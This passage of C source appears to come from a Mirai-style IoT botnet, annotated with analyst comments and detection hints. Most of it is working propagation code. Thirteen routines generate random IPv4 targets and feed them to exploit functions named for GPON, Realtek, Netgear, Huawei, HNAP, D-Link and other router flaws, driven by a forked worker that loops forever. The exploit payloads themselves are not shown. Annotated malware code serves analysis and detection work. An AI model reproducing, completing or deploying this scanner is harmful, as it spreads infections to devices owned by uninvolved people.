    // Remaining three octets of each address.
    ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
    ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
    ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

    sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

    // Each call forks its own short-lived child process.
    exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6);
}
// Analyst summary: target selection for the port-80 GPON routine.
//
// Builds six dotted-quad strings per call and hands each to
// exploit_socket_gpon80. The first octet comes from GPON2_Range; the other
// three octets are rand() % 255 (values 0-254). rand() is reseeded from the
// wall clock on every call. Octets are staged in the shared ipState buffer
// (slots 0-23).
//
// Detection: a burst of outbound TCP connection attempts to port 80 on
// unrelated addresses whose first octet is one of the GPON2_Range values.
void GPON80_IPGen()
{
    char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0};
    char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0};

    srand(time(NULL));
    // Indices into GPON2_Range for the six first octets.
    int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *));
    int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *));

    // First octet of each address (every fourth slot).
    ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];
    ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];
    // Remaining three octets of each address.
    ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
    ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
    ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

    sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

    // Each call forks its own short-lived child process.
    exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);
}
// Analyst summary: target selection for the realtek routine.
//
// Builds ten dotted-quad strings per call and hands each to
// exploit_socket_realtek. First octets are rand() % 233 (values 0-232), the
// other octets rand() % 255 (values 0-254); no address ranges are excluded
// here. rand() is reseeded from the wall clock on every call. All 40 slots of
// the shared ipState buffer are used.
//
// Detection: bursts of outbound TCP connection attempts to port 52869 on
// unrelated, effectively random addresses.
void REALTEK_IPGen()
{
    char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};
    char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};

    srand(time(NULL));
    // Every fourth slot (0, 4, 8, ...) is a first octet; the rest follow it.
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
    ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
    ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
    ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
    ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

    sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
    sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
    sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

    // Each call forks its own short-lived child process.
    exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);
    exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);
}
// Analyst summary: target selection for the netgear routine.
//
// Builds ten dotted-quad strings per call and hands each to
// exploit_socket_netgear. First octets are rand() % 233 (values 0-232), the
// other octets rand() % 255 (values 0-254); no address ranges are excluded
// here. rand() is reseeded from the wall clock on every call. All 40 slots of
// the shared ipState buffer are used.
//
// Detection: bursts of outbound TCP connection attempts to ports 8080 and 80
// on unrelated, effectively random addresses.
void NETGEAR_IPGen()
{
    char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};
    char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};

    srand(time(NULL));
    // Every fourth slot (0, 4, 8, ...) is a first octet; the rest follow it.
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
    ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
    ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
    ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
    ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

    sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
    sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
    sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

    // Each call forks its own short-lived child process.
    exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);
    exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);
}
// Analyst summary: target selection for the huawei routine.
//
// Builds five dotted-quad strings per call and hands each to
// exploit_socket_huawei. First octets are rand() % 233 (values 0-232), the
// other octets rand() % 255 (values 0-254). rand() is reseeded from the wall
// clock on every call. Uses slots 0-19 of the shared ipState buffer.
//
// Detection: bursts of outbound TCP connection attempts to port 37215 on
// unrelated, effectively random addresses.
void HUAWEI_IPGen()
{
    char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};

    srand(time(NULL));
    // Every fourth slot (0, 4, 8, ...) is a first octet; the rest follow it.
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;

    sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);

    // Each call forks its own short-lived child process.
    exploit_socket_huawei(huawei_ip1);
    exploit_socket_huawei(huawei_ip2);
    exploit_socket_huawei(huawei_ip3);
    exploit_socket_huawei(huawei_ip4);
    exploit_socket_huawei(huawei_ip5);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_tr064. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound TCP connection attempts to ports 7574 and 5555 on
// unrelated addresses.
void TR064_IPGen()
{
    char tr_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_tr064(tr_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_hnap. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound HTTP POSTs to /HNAP1/ on port 80 of unrelated addresses.
void HNAP_IPGen()
{
    char hnap_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_hnap(hnap_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_crossweb. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound TCP connection attempts to port 81 on unrelated
// addresses.
void CROSSWEB_IPGen()
{
    char crossweb_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_crossweb(crossweb_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_jaws. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound HTTP GETs for /shell on port 80 of unrelated addresses.
void JAWS_IPGen()
{
    char jaws_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_jaws(jaws_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_dlink. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound TCP connection attempts to port 49152 on unrelated
// addresses.
void DLINK_IPGen()
{
    char dlink_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_dlink(dlink_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_r7064. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound TCP connection attempts to port 8443 on unrelated
// addresses.
void R7000_IPGen()
{
    char r7000_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_r7064(r7000_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_vacron. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Detection: outbound requests for /board.cgi on port 8080 of unrelated
// addresses.
void VARCON_IPGen()
{
    char varcon_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_vacron(varcon_ip1);
}
// Analyst summary: picks one pseudo-random IPv4 address per call and passes it
// to exploit_socket_awsec2. First octet is rand() % 233 (0-232), the others
// rand() % 255 (0-254); rand() is reseeded from the wall clock each call.
// Nothing here restricts the address to any provider's ranges.
// Detection: outbound requests for /board.cgi on port 8080 of unrelated
// addresses.
void AWSEC2_IPGen()
{
    char awsec2_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(awsec2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_awsec2(awsec2_ip1);
}
// Analyst summary: entry point of the propagation loop.
//
// Forks once and records the child's pid in scanner_pid; the parent returns to
// its caller. The child never returns: it cycles through all thirteen *_IPGen
// generators with a 300 ms pause before each, and once its pass counter
// exceeds 10 it sleeps for 12 seconds and subtracts 10 from the counter before
// resuming.
//
// Host-level indicators on an infected device: one long-lived process that
// spawns many short-lived children (each exploit routine forks and the child
// exits), and periodic bursts of outbound connection attempts to the ports
// used by the routines in this file, separated by quiet intervals.
// No wait() call appears in this listing; how children are reaped is not
// visible here.
void exploit_worker(void)
{
    int i = 0;
    scanner_pid = fork();

    // Parent or failed fork returns; only the child runs the loop below.
    if (scanner_pid > 0 || scanner_pid == -1)
        return;
restart:
    i++;
    // Pause after ten passes, then continue from a reduced counter.
    if (i > 10)
    {
#ifdef DEBUG
        printf("[sleep] active for 12 sec\n");
#endif
        sleep(12);
        i = i - 10;
        goto restart;
    }
    // One pass: every generator in a fixed order, 300 ms apart.
    usleep(300000);
    GPON8080_IPGen();
    usleep(300000);
    GPON80_IPGen();
    usleep(300000);
    REALTEK_IPGen();
    usleep(300000);
    NETGEAR_IPGen();
    usleep(300000);
    HUAWEI_IPGen();
    usleep(300000);
    TR064_IPGen();
    usleep(300000);
    HNAP_IPGen();
    usleep(300000);
    CROSSWEB_IPGen();
    usleep(300000);
    JAWS_IPGen();
    usleep(300000);
    DLINK_IPGen();
    usleep(300000);
    R7000_IPGen();
    usleep(300000);
    VARCON_IPGen();
    usleep(300000);
    AWSEC2_IPGen();
    goto restart;
}
// Stop the propagation loop by sending signal 9 to the pid stored in
// scanner_pid (set by exploit_worker). The per-target child pids
// (scanner3_pid and the other numbered variables) are not signalled here.
void exploit_kill(void)
{
    kill(scanner_pid, 9);
}
#endif